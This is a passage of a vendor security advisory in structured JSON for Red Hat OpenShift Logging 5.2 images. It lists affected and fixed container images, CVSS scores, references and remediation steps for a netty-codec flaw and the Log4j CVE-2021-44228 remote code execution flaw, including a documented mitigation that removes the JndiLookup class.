"release_date": "2021-09-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T18:38:45+00:00",
"details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.2, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5127"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way"
},
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T18:38:45+00:00",
"details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.2, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5127"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
